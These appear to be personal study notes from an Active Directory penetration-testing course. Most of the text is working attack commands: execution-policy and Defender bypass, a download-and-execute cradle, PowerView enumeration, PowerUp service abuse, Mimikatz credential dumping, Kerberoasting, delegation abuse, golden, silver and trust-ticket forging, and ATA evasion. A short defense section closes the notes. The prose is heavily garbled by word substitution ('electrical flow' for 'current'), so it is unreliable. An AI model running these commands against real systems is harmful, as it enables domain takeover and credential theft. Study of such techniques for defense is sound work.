Selective Authentication to the Red Forest enables stricter safety controls on logon of users from non-administrative forests.
Securing Prileged Access:
https://technet.microsoft.com/en-us/windows-server-docs/security/securing-privileged-access/securing-privileged-access
Microsoft Paper - Best Practices for Security Active Directory:
http://aka.ms/bpsadtrd
#################### THE END ################################################
Active Directory:
- Directory Service used to managed Windows networks
- stores information virtually objects on the network together with makes it easily available to users together with domains
- Active Directory enabled centralized, secure direction of an entire network, which powerfulness bridge a building, a metropolis or multiple locations
- Schema - defines objects together with their attributes
- enquiry together with index machinery - provides searching together with publication of objects together with their properties
- Global Catalog - contains information virtually every object inward the directory
- Replication Service - distributes information across domain controllers
- Forest, domains together with organizational unites (OUs) are the basic edifice blocks of whatever active directory structure.
- a wood is a safety boundary - may comprise multiple domains together with each domain may comprise multiple OUs.
PowerShell:
- provides access to almost everything inward a Windows platform together with AD environs which could live useful for an attacker
- provides the capability of running powerful scripts completely from retention making it ideal for foothold shells/boxes
- tardily to larn together with actually powerful
- based on .NET framework together with is tightly integrated amongst Windows
- PowerShell Core is platform independent
Open upwardly Windows PowerShell ISE every bit an Administrator:
See file amongst powershell commands...
Cmdlets are used to perform an activeness together with a .Net obkect is returned every bit the output
Cmdlets bring parameters for dissimilar operations
They have got aliases.
These are NOT executables, you lot tin write your ain cmdlet amongst few lines of script.
Examples:
cd C:\
dir: //this works
dir.exe: //this does not
Important!
Use the below command for listing all cmdlets:
get-command -commandtype cmdlet
There are many interesting cmdlets from a pentester's perspective.
For example:
get-process
, listing processes running on a system.
get-command -Name *process*
get-command -Verb set
It is a GUI Editor/Scripting Environment.
Tab Completion, context-sensitive help, syntax highlighting, selective execution, in-line assistance are around of the useful features.
Comes amongst a handy console pane to run commands from the ISE.
Execution Policy:
- this is NOT a safety measure, but it is a prevention stair out to foreclose a user from accidently executing scripts
- several ways to bypass:
powershell -executionbypass bypass .\script.ps1
powershell -c <cmd>
powershell -enc
Turn off the Windows Defender:
Set-MpPreference -disablerealtimeMonitoring $true
.\Invoke-Encode.ps1
Get-ExecutionPolicy
powershell -ep bypass
Powershell.exe -ExecutionPolicy bypass -File C:\Users\win10\Downloads\nishang-master\Utility\Invoke-Encode.ps1
- Powershell also supports modules.
- H5N1 module tin live imported with:
Import-module <path to module>
- all the commands inward a module tin live listed with:
Get-Command -Module <modulename>
Get-Command -module Get-ScheduledTask
Get-command -module
################
. c:\AD\Tools\Invoke-Encode.ps1
- the '.' inward forepart of the path (Above) is called point sourcing.
################
Whenever in that location is a command execution opportunity, PowerShell scripts tin live executed using next methods:
- Download execute cradle
iex(New-Object net.webclient).DownloadString('https://webserver/payload.ps1')
- Encodedcommand
>help powershell.exe //to let out out powershell.exe available commands!
CheckOut Invoke-CradleCrafter:
http://github.com/danielbohannon/Invoke-CradleCrafter
#####################
Lesson 2 Domain Enumeration:
PowerShell together with AD:
- [ADSI]
- .Net Classes
- Native Executables
- PowerShell (.NET classes or WMI or Active Directory Module)
Let's outset wirh Domain Enumeration together with map diverse entities, trusts, relationships together with privileges of the target domain.
We volition work opened upwardly source tools, such every bit PowerView, for domain enumeration.
https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
We volition also work Microsoft Active Directory module:
https://docs.microsoft.com/en-us/powershell/module/addsadministration/
After spending around fourth dimension to install PowerView together with the Install-ActiveDirectoryModule.ps1, nosotros tin finally outset doing around domain enumeration!
PS C:\users\win10\Downloads> powershell.exe -executionpolicy unrestricted
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\users\win10\Downloads> .\Install-ActiveDirectoryModule.ps1
NAME
Install-ADModule
SYNOPSIS
Installs the AD PowerShell module from RSAT for Windows 10
(partial re-create above)
- Get the electrical flow domain(PowerView)
Get-NetDomain
Get-NetDomain -Domain lethallab.local
- Get the electrical flow domain SID:
Get-DomainSID
- Using Active Directory module:
Get-ADDomain
Get-ADDomain -Identity lethallab.local
(Get-ADDomain).DomainSID.Value
Let's setup the environment!
You should brand certain you lot have got a adept working Domain Controller, every bit all the information is beingness pulled from a Domain Controller.
PS C:\Users\win10\Downloads\PowerSploit-master\Recon> Import-Module .\PowerView.ps1
PS C:\users\win10\Downloads\PowerSploit-master\recon> get-command -module recon
PS C:\users\win10\Downloads\PowerSploit-master\recon> get-netdomain
PS C:\Users\win10\Downloads\PowerSploit-master\Recon> get-netdomain -domain lethallab.local
Forest : lethallab.local
DomainControllers : {Win2008SRV.lethallab.local, WIN2016SRV.lethallab.local}
Children : {}
DomainMode : Windows2003Domain
DomainModeLevel : 2
Parent :
PdcRoleOwner : Win2008SRV.lethallab.local
RidRoleOwner : Win2008SRV.lethallab.local
InfrastructureRoleOwner : Win2008SRV.lethallab.local
Name : lethallab.local
-Get Domain Controllers for a domain:
PS C:\Users\win10\Downloads> Get-NetDomainController
PS C:\Users\win10\Downloads> Get-NetDomainController -domain lethallab.local
- Using Active Directory module:
Get-ADDomainController
Get-ADDomainController -Discover -DomainName lethallab.local
- Get users of a domain:
Get-NetUser
get-netuser | choose name
Get-NetUser -Domain lethallab.local
Get-NetUser -UserName win10
-Using ActiveDirectory module:
Get-ADUser -Filter * -Properties *
Get-ADUser -Server ps-dc.lethallab.local
Get-ADUser -Identity win10
-Get all the groups inward the electrical flow domain:
Get-NetGroup
Get-NetGroup *admin*
- Using Active Directory Module:
Get-ADGroup -Filter * | choose Name
Get-ADGroup -Filter 'Name -like "*admin*"' | choose Name
get-adgroup -filter {Name -like "*admin*"} |select name
- Get all the members of the Domain Admins group:
Get-NetGroupMember -GroupName "Domain Admins"
- Get ActiveDirectory Module
Get-ADGroupMember -Identity "Domain Admins" -Recursive
- Get the grouping membership of a user:
Get-NetGroup -UserName "labuser"
- Using ActiveDirectory Module:
Get-ADPrincipalGroupMembership -Identity labuser
- Get all computers of the domain:
Get-NetComputer
Get-NetComputer -FullData
- Using ActiveDirectory Module:
Get-ADComputer -Filter * | choose Name
Get-ADComputer -Filter * -Properties *
Note to self: You should continue inward heed together with consider that the information is pulled from the information your Domain Controller has, together with it's non an indication that the physical reckoner even hence exists. Most companies continue obsolete information inward Active Directory, because they never acquire through an Active Directory maintenance together with cleanup. In either case, the information tin even hence live useful inward your exploitation attempts!
- Find all machines on the electrical flow domain where the electrical flow user has local admin access:
Find-LocalAdminAccess -verbose
- Find local admins on all machines of the domain:
Invoke-EnumerateLocalAdmin -verbose
- List Sessions on a special computer:
Get-NetSession -ComputerName ops-dc
Note: Domain Administrator is a real sought afterwards target, but DO NOT acquire afterwards the Domain Admin (DA) blindly! Make certain getting the DA trouble concern human relationship is the goal/purpose of the engagement!
- Find computers where a domain admin is logged inward together with electrical flow user has access:
Invoke-UserHunter -CheckAccess -Verbose
- Above gets a listing of machines from DC together with listing sessions together with logged on users_from_each machine! This is non tardily to find, but it's even hence a useful command to run!
Hands-On number 1:
- Enumerate the next for the electrical flow domain:
Users, Computers, Domain Administrators, Shares, Sessions on the Domain Controller.
Demonstration: Block user hunting(session enumeration) on the Domain Controller!!!!!!
- nosotros tin work a script called NetCease.ps1 that strips such permissions from a box.
######
Domain Enumeration - ACL:
You tin let out ACLS inward Active Directory nether a user (for example), Security tab, Advanced, together with the Permissions tab.
- Get the ACLs associated amongst the specified object:
Get-ObjectACL -SamAccountName win10 -ResolveGUIs
- Get the ACLs associated amongst the specified prefix to live used for search:
Get-ObjectACL -ADSprefix 'CN=Administrator, CN=Users' -Verbose
- We tin also enumerate ACLs using Active Directory Module but without resolving GUIDs:
(Get-ACL 'AD:\CN=win10, CN=Users, DC=win2008srv, DC=lethallab, DC=local').Access
- To aspect for interesting ACEs:
Invoke-ACLScanner -ResolveGUIDs
Hands-On number 2:
- Enumerate next for the electrical flow domain:
Check if win10 user has Write/Modify permissions on whatever objects!
##############
Domain Enumeration - Trusts:
- Get a listing of all domain trusts for the electrical flow domain, if you lot have got any, but it's possible that inward your abode lab network, you lot volition non have got any, since you lot exclusively have got ane wood or (if any) kid domain:
Get-NetDomainTrust //don't worry if you lot don't have got whatever inward your lab domain
Get-NetDomainTrust -Domain redps.offensiveps.lethallab.local //this would live a kid domain of the lethallab.local domain
- Using Active Directory Module:
Get-ADTrust -Filter *
Get-ADTrust -Identity redps.offensiveps.lethallab.local
- Get details virtually the electrical flow forest:
Get-NetForest
Get-NetForest -Forest lethallab.local
- Using Active Directory Module:
Get-ADForest
Get-ADForest -Identity lethallab.local
- Get all domains inward the electrical flow forest:
Get-NetForestDomain
Get-NetForestDomain -Forest lethallab.local
- Using ActiveDirectory Module:
(Get-ADForest).Domains
- Get trusts inward the wood (if you lot have got a wood trust inward your lab together with if you lot don't, together with then don't aspect an output):
Get-NetForestTrust
Get-NetForestTrust -Forest lethallab.local
- Using ActiveDirectory Module:
Get-ADTrust -Filter 'msDS-TrustForestTrustInfo -ne "$null"'
Hands-On number 3:
Enumerate all the trusts - domain trusts, external trusts together with others for the electrical flow forest.
#####################
Lesson 3 Local Privilege Escalation:
- upwardly to now, nosotros have got exclusively done a lot of enumeration!
In an AD environment, in that location are multiple scenarios which Pb to privilege escalation. We had a aspect for the following:
- Hunting for Local Admin access on other machines
- Hunting for high privilege domain trouble concern human relationship (like a Domain Admin)
There are diverse ways to privilege escalate on Windows boxes:
- Missing patches
- Automated deployment together with AutoLogon passwords inward clear text
- AlwaysInstallElevated (any user tin run MSI on SYSTEM)
- Misconfigured Services
- DLL HiJacking
- Token Manipulation or Impersonation
PowerUp:
- Let's work PowerUp from PowerSploit for local privilege escalation past times abusing services.
- Get Services amongst unquotes paths together with a infinite inward their call or executable path:
Get-ServiceUnquotes -Verbose
ex:
Get-WmiObject win32_service | fl *
For instance if inward the path c:\ftpserver\ftp server\myftp\ftp.exe , the c:\ftpserver\ftp server\myftp\ftp.exe is unquoted, an assailant tin drib an ftp.exe, together with every bit before long every bit the user, correct the correct permissions, run the program, nosotros tin privilege escalate. That's why it's called the unquoted path vulnerability! For this to NOT work, the path would have got to live inward quotes, similar this:
"c:\ftpserver\ftp server\myftp\ftp.exe" .
- Get Services where the electrical flow user tin write to its binary path:
Get-ModifiableServiceFile -Verbose
- Get the Services which electrical flow user tin modify:
Get-ModifiableService -Verbose
- Run all Checks:
Invoke-AllChecks
Example:
PS C:\Users\win10\Downloads\PowerSploit-master> cd .\Privesc\
PS C:\Users\win10\Downloads\PowerSploit-master\Privesc> ls
Directory: C:\Users\win10\Downloads\PowerSploit-master\Privesc
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/2/2018 11:55 PM 26485 Get-System.ps1
-a---- 9/2/2018 11:55 PM 562841 PowerUp.ps1
-a---- 9/2/2018 11:55 PM 1564 Privesc.psd1
-a---- 9/2/2018 11:55 PM 67 Privesc.psm1
-a---- 9/2/2018 11:55 PM 4297 README.md
PS C:\Users\win10\Downloads\PowerSploit-master\Privesc> Import-Module .\PowerUp.ps1
PS C:\Users\win10\Downloads\PowerSploit-master\Privesc> Invoke-AllChecks
[*] Running Invoke-AllChecks
[*] Checking if user is inward a local grouping amongst administrative privileges...
[+] User is inward a local grouping that grants administrative privileges!
[+] Run a BypassUAC assault to get upwardly privileges to admin.
[*] Checking for unquoted service paths...
[*] Checking service executable together with declaration permissions...
ServiceName : ISSUSER
Path : "C:\Program Files\LANDesk\LDClient\issuser.exe" /SERVICE
ModifiableFile : C:\
ModifiableFilePermissions : AppendData/AddSubdirectory
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName : LocalSystem <----- amongst LOCALSYSTEM!!!!!!!
AbuseFunction : Install-ServiceBinary -Name 'ISSUSER'
CanRestart : False <------- nosotros demand to hold off for the machine to live rebooted
ServiceName : ISSUSER
Path : "C:\Program Files\LANDesk\LDClient\issuser.exe" /SERVICE
ModifiableFile : C:\
ModifiableFilePermissions : {Delete, GenericWrite, GenericExecute, GenericRead}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'ISSUSER'
CanRestart : False
[*] Checking service permissions...
[*] Checking %PATH% for potentially hijackable DLL locations...
ModifiablePath : C:\Users\win10\AppData\Local\Microsoft\WindowsApps
IdentityReference : LETHALLAB\win10
Permissions : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH% : C:\Users\win10\AppData\Local\Microsoft\WindowsApps
AbuseFunction : Write-HijackDll -DllPath 'C:\Users\win10\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'
[*] Checking for AlwaysInstallElevated registry key...
[*] Checking for Autologon credentials inward registry...
[*] Checking for modifidable registry autoruns together with configs...
[*] Checking for modifiable schtask files/configs...
[*] Checking for unattended install files...
[*] Checking for encrypted web.config strings...
[*] Checking for encrypted application puddle together with virtual directory passwords...
[*] Checking for plaintext passwords inward McAfee SiteList.xml files....
[*] Checking for cached Group Policy Preferences .xml files....
PS C:\Users\win10\Downloads\PowerSploit-master\Privesc>
##########
PS C:\Users\win10\Downloads\PowerSploit-master\Privesc> Invoke-ServiceAbuse
PS C:\Users\win10\Downloads\PowerSploit-master\Privesc> Invoke-ServiceAbuse -examples
PS C:\Users\win10\Downloads\PowerSploit-master\Privesc> Invoke-ServiceAbuse -Name AbyssWebServer -UserName 'lethallab\wi
n10'
- the lastly Invoke-ServiceAbuse command, volition add together the electrical flow user: win10 to the local Administrators group. We had to read the Invoke-ServiceAbuse amongst the -examples parameter, hence that nosotros tin larn how to run the command properly. We volition demand to logoff from the trouble concern human relationship together with log on, hence that the novel permissions bring effect!
And right away amongst Admin privileges nosotros tin run the command below to disable AV protection:
>Set-MpPreference -DisableRealtimeMonitoring $true
Hands-On number 4:
Exploit a service on your lab VM together with get upwardly privileges to local administrator!
#####################
Lesson four Lateral Movement Protocols together with tools:
PowerShell Remoting
Think of it every bit psexec on steroids.
You volition let out this increasingly used inward enterprises. Enabled past times default on Server 2012 onwards!
You may demand to enable remoting (Enable-PSRemoting) on a Desktop Windows machines, Admin privs are required to exercise that.
You acquire elevated musical rhythm out on remote scheme if admin creds are used to authenticate (which is the default setting).
One-on-One
PSSession:
- Interactive
- Runs inward a novel procedure (wsmprovhost)
- Is Stateful
Useful cmdlets:
- New-PSSession
- Enter-PSSession
Example:
PS C:\Users\Administrator.WIN2008SRV> new-pssession -ComputerName win2016srv
Id Name ComputerName State ConfigurationName Availability
-- ---- ------------ ----- ----------------- ------------
1 Session1 win2016srv Opened Microsoft.PowerShell Available
PS C:\Users\Administrator.WIN2008SRV> $sess = New-PSSession -computername win2016sr
PS C:\Users\Administrator.WIN2008SRV> Enter-PSSession -session $sess
[win2016srv]: PS C:\Users\administrator\Documents> hostname
WIN2016SRV
PowerShell Remoting:
- One-to-Many
- Also Known every bit Fan-Out remoting
- non-interactive
- executes commands parallely
- useful cmdlets
- Invoke-Command
- Invoke-Command
- Run commands together with scripts on:
- multiple remote computers
- inward disconnected session (v3)
- every bit background chore together with more.
- the best affair inward PowerShell for passing the hashes, using credentials together with executing commands on multiple remote computers.
- Use-Credential parameter to exceed username/password.
- work below to execute commands or semicolon separated scripts:
Invoke-Command -Scriptblock {Get-Process} -ComputerName (Get-Content <list of servers>)
example:
Invoke-Command -ScriptBlock{whoami;hostname} -ComputerName win2016srv
PS C:\Users\Administrator.WIN2008SRV> Invoke-Command -ScriptBlock{whoami;hostname} -ComputerName win2016srv
lethallab\administrator
WIN2016SRV
Invoke-Command -ScriptBlock{$who = whoami} -ComputerName win2016srv
Invoke-Command -ScriptBlock{$who} -ComputerName win2016srv
- work below command to execute scripts from files:
Invoke-Command -FilePath c:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content <list of servers>)
ex:
Invoke-Command -FilePath c:\AD\Tools\Invoke-Encode.ps1 -ComputerName Win2016srv
powershell.exe -ep bypass
. c:\AD\Tools\Invoke-Mimikatz.ps1
Invoke-Command -ScriptBlock ${function:Invoke-Mimikatz} -ComputerName win2016srv
- Use below to execute "Stateful" commands:
$Sess = New-PSSession -ComputerName Server1
Invoke-Command -Session $Sess -ScriptBlock {$Proc = Get-Process}
Invoke-Command -Session $Sess -ScriptBlock {$Proc.Name}
$sess = New-PSSession -computername win2016sr
Invoke-Command -ScriptBlock{$who = whoami} -Session $sess
Invoke-Command -ScriptBlock{$who} -Session $sess
Invoke-Mimikatz:
- the script could live used to dump credentials, tickets together with to a greater extent than using mimikatz amongst PowerShell without dropping the exe to the disk.
- it is useful for passing together with replaying hashes, tickets together with for many exciting Active Directory attacks
- using the code from ReflectivePEInjection, mimikatz is loaded reflectively into the memory. All the functions of mimikatz could live useful from this script!
- mimikatz is even hence beingness detected, but nosotros tin even hence work it amongst downloaded cradle, or everywhere where nosotros tin execute commands or powershell.
- Dump Credentials on a local machine:
Invoke-Mimikatz -DumpCreds
- Dump certs on a local machine:
Invoke-Mimikatz -DumpCerts
- Dump Credentials on multiple remote machines:
Invoke-Mimikatz -DumpCreds -ComputerName @("sys1","sys2")
- Invoke-Mimikatz uses PowerShell remoting cmdlet Invoke-Command to run the to a higher house command. Thus, credentials or administrative access to the remote computers is required!
- "Over-pass-the-hash" generate tokens from hashes:
Invoke-Mimikatz -Command '"sekurlsa::pth /user:administrator /domain:. /ntlm:<ntlmhash> /run:powershell.exe"'
(we tin run whatever command instead of the powershell.exe)
Token Manipulation:
- it is possible to use/impersonate tokens available on a machine
- oft tokens are available on machines due to interactive logons, accessing resources, running processes, SSO applications, etc.
- tin nosotros work Invoke-TokenManipulation from PowerSploit or Incognito for token impersonation
- administrative privileges are required to suit token privileges.
- List all the tokens on a machine:
Invoke-TokenManipulation -ShowAll
- List all unique, usable tokens on a machine:
Invoke-TokenManipulation -Enumerate
- Start a novel procedure amongst token from a specific user:
Invoke-TokenManipulation -ImpersonateUser -Username "domain\user"
- Start intelligence procedure amongst token of around other process:
Invoke-TokenManipulation -CreateProcess "C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe" -ProcessID 500
#############################
Video five Domain Privilege Escalation:
NOTE: around information below powerfulness non live accurate, because I didn't have got a trust domain configured inward my abode lab; hence care for it amongst a grain of salt, but know that the commands are accurate together with the exclusively affair you lot should worry virtually is the domains inward the command.
Read upwardly on Kerberos authentication together with how the customer reckoner contacts the KDC/DC server, to have the TGT/TGS hence that it tin access an application server together with also how every step, it's abusable!
Kerberoast:
- offline swell of service trouble concern human relationship passwords
- the Kerberos session ticket (TGS) has a server portion which is encrypted amongst the password hash of the service account. This makes it possible to asking a ticket together with exercise offline brute-forcing.
- service accounts are many times ignored (passwords are rarely changed) together with have got Domain Admin privilege access.
- password hashes of service accounts could live used to create Silver tickets.
- presented past times Tim Medin at DerbyCon 2014.
We are afterwards the TGT encrypted ticket amongst krbtgt hash when requesting a TGS ticket (TGS-REQ).
TGS encrypted using target service's NTLM hash (TGS-REP).
We tin asking a TGS from whatever service together with the KDC volition response amongst a TGT ticket.
- Find Service Accounts:
GetUserSPNs
https://github.com/nidem/kerberoast/blob/master/GetUserSPNs.ps1
- PowerView:
Get-NetUser -SPN
Note: for the to a higher house command, you lot should know which user accounts are domain admins!
- Active Directory module (to let out krbtgt together with priv service accounts)
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
- Request a ticket:
Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQL/win2016srv.lethallab.local:SQLEXPRESS"
- Request a ticket using PowerView:
Request-SPNTicket
- Check if the ticket has been granted:
klist.exe
- Export all tickets using Mimikatz:
Invoke-Mimikatz -Command '"kerberos::list /export"'
ls
Crack the Service trouble concern human relationship password:
python.exe .\tgsrepcrack.py .\passwords.txt '.\2-40a10000-labuser@MSSQLvc ops-win2016srv.lethallab.local SQLEXPRESS-lethallab.local.kirbi'
Kerberos Delegation:
- Kerberos Delegation allows the "to reuse the end-user credentials to access resources hosted on a dissimilar server". Like an application server or database server. This is to a greater extent than oft than non used where Kerberos Double Hop is required.
- Impersonating the incoming/authenticating user is necessary for whatever sort of Kerberos delegation to work.
- Kerberos delegation is of 2 types:
- Unconstrained (only selection till Server 2003)
- Constrained
How does Kerberos Delegation work:
- a user provides credentials to the Domain Controller
- the DC returns a TGT
- the user requests a TGS for the spider web service on Web Server
- The DC provides a TGS.
- the user sends the TGT together with TGS to the spider web server.
- the spider web server service trouble concern human relationship uses the user's TGT to asking a TGS for the database server from the DC.
- the spider web server service trouble concern human relationship connects to the database server every bit the user.
Unconstrained Delegation:
When laid for a special service account, Unconstrained delegation allows delegation to whatever service on that special machine.
The service trouble concern human relationship tin together with then asking access to whatever service inward the domain past times impersonating the incoming user (because the DC placed the user's TGT within the TGS inward stair 4). In our example, the spider web server service trouble concern human relationship tin asking access to whatever service inward the domain every bit the user connecting to it.
This could live used to escalate privileges inward instance nosotros tin compromise such a machine together with a Domain Admin (or other high privilege user) connects to that machine.
- Discover domain computers which have got unconstrained delegation enabled using PowerView:
Get-NetComputer -UnConstrained
- Using Active Directory Module:
Get-ADComputer -Filter {TrustedForDelegation -eq $True}
Get-ADUser -Filter {TrustedForDelegation -eq $True}
- We demand to compromise the server where Unconstrained Delegation is enabled together with hold off for or describe a fast ane on a high privilege user to connect to the box. Once such a user is connected, nosotros tin export all the tickets, including the TGT of that user using the next command:
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
Note: nosotros demand administrator rights on the server, where Unconstrained Delegation is enabled!
- the ticket tin live reused:
Invoke-Mimikatz -Command '"kerberos::ptt c:\tickets\admin.kirbi"'
Constrained Delegation:
- Introduced inward Server 2008
- every bit the call suggests, constrained delegation allows access exclusively to specified services on specific computers!
- a typical abusable scenario is when a pupil authenticates using a non-kerberos authentication together with Protocol Transition is used past times Kerberos to back upwardly a unmarried sign on.
- Couple of Kerberos extensions come upwardly into play for Protocol Transition but nosotros are non going to beak over them.
- The service trouble concern human relationship must have got TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION-T2A4D UserAccountControl attribute.
- the service trouble concern human relationship tin access all the services specified inward its msDS-AllowedToDelegateTo attribute.
- around other interesting number is that the delegation occurs non exclusively for the specified service but for whatever service running nether the same account. There is no validation for the SPN specified.
- Enumerate users together with computers amongst constrained delegation enabled.
- Using PowerView (dev):
.\PowerView-Dev.ps1
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
- Using Active Directory Module:
Get-AdObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
- nosotros demand to acquire clear text password or the NTLM hash of the service account. It tin together with then live used amongst Kekeo:
https://github.com/gentilkiwi/kekeo/
.\asktgt.exe /user:termadmin /domain:lethallab.local /key:abf05c4e729e45781acd30ed80674b1c /ticket:termadmin.kirbi
- Now, using s4u from Kekeo, asking a TGS:
\s4u.exe /tgt:termadmin.kirbi /user:administrator@lethallab.local /service:cifs/ops-sqlsrvone.lethallab.local
- Use the TGS:
Invoke-Mimikatz -command '"kerberos:Ptt cifs.ops-sqlsrvone.lethallab.local.kirbi"'
ls \\ops-sqlsrvone.lethallab.local\C$
- recollect that the delegation is non restricted past times SPN, it is possible to create alternate tickets. Exploit it :)
############################
Video six Persistence Techniques:
- in that location are many, but nosotros volition exclusively rear 2 of them together with these 2 are actually useful
- H5N1 golden ticket is signed together with encrypted past times the hash of krbtgt trouble concern human relationship which makes it a valid TGT ticket.
- since user trouble concern human relationship validation is non done past times the Domain Controller (KDC service) until TGT is older than xx minutes, nosotros tin work fifty-fifty deleted/revoked accounts.
- the krbtgt user hash could live used to impersonate whatever user amongst whatever privileges from fifty-fifty a non-domain machine.
- unmarried password alter has no consequence on this ticket.
- Execute mimikatz on DC:
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName win2016srv
- On Any Machine:
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:lethallab.local /sid:s-1-5-21-32-70384115-3177237293-604223749 /krbtgt:5c1a7d30a872cac2b732e7857589d97 /id:500 /groups:513 /ptt"'
- To work the DCSync characteristic for getting krbtgt hash execute the next command amongst DA privileges for ops domain:
Invoke-Mimikatz -Command '"lsadump:dcsync /user:ops\krbtgt'"
- H5N1 valid TGS (Golden ticket is TGT).
- Encrypted together with Signed past times the NTLM hash of the service trouble concern human relationship (Golden ticket is signed past times hash of krbtgt) of the service running amongst that account.
- Services rarely depository fiscal establishment jibe PAC (Privileged Attribute Certificate).
- Services volition allow access exclusively to the services themselves.
- For example, using hash of the Domain Controller reckoner account, the below command provides access to shares on the DC:
Invoke-Mimikatz -Command '"kerberos::golden /domain:lethallab.local /sid:s-1-5-21-3270384115-3177237293-604223748 /target:win2008srv.lethallab.local /service:cifs /rc4:536752aef9acef8ad3b089a281830b1 /id:500 /user:Administrator /ptt"'
#######################
Video seven Privilege Escalation Across Trusts together with Domains:
Child to Forest Root:
- Domains inward the same wood have got an implicit two-way trust amongst the wood root
- There is a trust key betwixt the parent together with kid domains.
- There are 2 ways of escalating privileges betwixt 2 domains of the same forest:
- krbtgt hash
- Tryst tickets
Look upwardly Child to Parent Trust Flow together with read upwardly on it!
Child to Forest Root using Trust Tickets:
- So what is required to forge trust tickets is, obviously, the trust key:
Invoke-Mimikatz -Command '"lsadump::trust /patch"'
- An inter-realm TGT tin live forged:
Invoke-Mimikatz -Command '"Kerberos::golden /domain:win2008srv.lethallab.local /sid:s-1-5-21-133038098-372414864-1077246548 /sids:s-1-5-21-3270384115-3177237393-604224748-519 /rc4:f43d2a6daf7641d745fb225be755d8110 /user:Administrator /service:krbtgt /target:powershell.local /ticket:c:\users\Administrator\Desktop\trust_tkt.kirbi"'
- Use the TGS to access the targeted service:
.\kirbikator.exe lsa .\CIFS.ps-dc.powershell.local.kirbi ls \\ps-dc.powershell.local\C$
- Get a TGS for a service (CIFS below) inward the target domain past times using the forged trust ticket:
.\asktgs.exe c:\users\administrator\Desktop\trust_tkt.kirbi CIFS/ps-dc.powershell.local
- Tickets for other services (like HOST together with RPCSS for WMI, HOST together with HTTP for PowerShell Remoting together with WinRM) tin live created every bit well.
Child to Forest Root using krbtgt hash:
- SID history in ane trial again:
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:offensiveps.powershell.local /sid:s-1-5-21-2969453985-3470385542-739374646 /krbtgt:a9d1cf9d08b6701bca220079b1557506 /sids:s-1-5-21-257853-8781-2508153159-3419410681-519 /ticket:krb_tkt.kirbi"'
- On a machine of offensivepc domain:
Invoke-Mimikatz -Command '"kerberos::pt c:\test\krb_tkt.kirbi"'
- We right away have got Enterprise Admin Privileges:
ls //ps-dc.powershell.local/C$
#######################
Video eight Detection together with Defense:
- Do non allow or bound login of DAs to whatever other machine other than the Domain Controller. If logins to around server is necessary, exercise non allow other administrators to login to that machine!
- Do NOT run services amongst DA account. Many adept credential reuse defenses are rendered useless because of it.
Some Important Event ID:
-Event ID:
- 4624: Account Logon
- 4634: Admin Logoff
- 4672: Admin Logon
Detection together with Defense against Kerberoast:
Events:
- Security Event ID 4769 - H5N1 Kerberos ticket was requested
Migitation:
- Service Account Passwords should live difficult to gauge (greater than 25 characters)
- Use Managed Service Accounts (Automatic alter of password periodically together with delegated SPN Management)
https://technet.microsoft.com/en-us/library/jj128431(v=ws.11).aspx
SID filtering:
- avoid attacks which abuse SID history attribute (child to rootage domain privilege escalation, that is, DA from a Child to EA on wood root).
- enabled past times default on all inter-forest trusts. Intra-Forest trusts are assumed secured past times default (Microsoft considers wood together with non the domain to live a safety boundary).
- But, since SID filtering has potential to suspension applications together with user access, it is oft disabled.
Selective Authentication:
- inward an inter-forest trust, if Selective Authentication is configured, users betwixt the trusts volition non live automatically authenticated. Individual access to domains together with servers inward the trusting domain/forest should live given.
Microsoft ATA (Advanced Threat Analytics):
- traffic destined for Domain Controller(s) is mirrored to ATA sensors together with a user activity profile is construct over fourth dimension - work of computers, credentials, log on machines, etc.
- Collect Event 4776 (The DC attempted to validate the credentials for an account) to abide by credential replay attacks.
- Can DETECT behaviour anomalies!
- Useful for detecting:
- Recon: trouble concern human relationship enumeration, Netsession enumeration
- Compromised Credentials Attacks: Brute force, high privilege account/service trouble concern human relationship exposed inward clear text, Honey token, odd protocol (NTLM together with Kerberos)
- Credential/Hash/Ticket Replay attacks.
Bypassing ATA:
- ATA, for all its goodness, tin live bypassed together with avoided
- The key is avoid talking to the DC every bit long every bit possible together with brand seem the traffic nosotros generate every bit assailant normal!
Architectural Changes:
LAPS(Local Administrator Password Solution):
- Centralized storage of passwords inward AD amongst periodic randomizing where read permissions tin live access controlled
- Storage inward clear text, transmission is encrypted
- LAPS into: https://technet.microsoft.com/en-us/mt227395.aspx
- Abusing LAPS feature:
https://blog.netspi.com/running-laps-around-cleartext-passwords/
Privileged Administrative Workstations (PAWs):
- a hardened workstation for performing sensitive tasks similar management of domain controllers, cloud infrastructure, sensitive trouble concern functions, etc.
- tin render protection from phishing attacks, OS vulnerabilities, credential replay attacks.
Privileged Administrative Workstations (PAWs):
Multiple strategies:
- Separate privilege together with hardware for administrative together with normal tasks
- Admin Jump servers to live accessed exclusively from a PAW
- Having a VM on a PAW for user tasks
Active Directory Administrative Tier Model
Composed of 3 levels exclusively for administrative accounts:
- Tier 0 - Accounts, Groups, together with computers which have got privileges across the company similar domain controllers, domain admins, company admins.
- Tier 1 - Accounts, Groups together with Computers which have got access to resources having meaning amount of trouble concern value. H5N1 mutual illustration role is server administrators who hold these operating systems amongst the powerfulness to conduct on all company services.
- Tier 2 - Administrator accounts which have got administrative command of meaning amount of trouble concern value that is hosted on user workstations together with devices. Examples, include Help Desk together with reckoner back upwardly administrators because they tin conduct on the integrity of almost whatever user data.
So nosotros are implementing: Control Restrictions, Logon Restrictions (and Directional from Tier 2, to Tier 1, to Tier 0).
